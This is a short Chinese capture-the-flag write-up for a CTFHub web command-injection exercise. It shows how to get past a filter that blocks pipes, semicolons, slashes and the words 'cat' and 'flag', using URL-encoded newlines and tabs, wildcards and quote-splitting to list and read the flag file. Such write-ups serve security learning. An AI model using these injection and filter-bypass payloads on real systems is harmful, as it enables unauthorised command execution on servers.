CTFHUB-web-RCE-综合过滤练习

开启题目

查看网页源代码发现这次网页对 | 、 && 、 || 、 \ 、 / 、; ,都进行了过滤处理

发现换行符 %0a 和回车符 %0d 可以进行测试,在 URL 后面拼接访问

复制代码
127.0.0.1%0als

用 ls flag_is_here 查看 flag 文件中的内容,发现回显为空,发现网页源代码中还过滤了几个字符,分别是 cat 、 flag 、 ctfhub ,这里尝试使用 %09 ( URL 编码中 表示 Tab 制表符)加上通配符进行绕过

复制代码
127.0.0.1%0als%09*here
复制代码
127.0.0.1%0acd%09*here%0ac%27a%27t%09*_31687958414358.php
相关推荐
用户962377954481 天前
DVWA 靶场实验报告 (High Level)
安全
数据智能老司机1 天前
用于进攻性网络安全的智能体 AI——在 n8n 中构建你的第一个 AI 工作流
人工智能·安全·agent
数据智能老司机1 天前
用于进攻性网络安全的智能体 AI——智能体 AI 入门
人工智能·安全·agent
用户962377954481 天前
DVWA 靶场实验报告 (Medium Level)
安全
red1giant_star1 天前
S2-067 漏洞复现:Struts2 S2-067 文件上传路径穿越漏洞
安全
用户962377954481 天前
DVWA Weak Session IDs High 的 Cookie dvwaSession 为什么刷新不出来?
安全
cipher3 天前
ERC-4626 通胀攻击:DeFi 金库的"捐款陷阱"
前端·后端·安全
一次旅行6 天前
网络安全总结
安全·web安全
red1giant_star6 天前
手把手教你用Vulhub复现ecshop collection_list-sqli漏洞(附完整POC)
安全
一个人旅程~6 天前
如何用命令行把win10/win11设置为长期暂停更新?
linux·windows·经验分享·电脑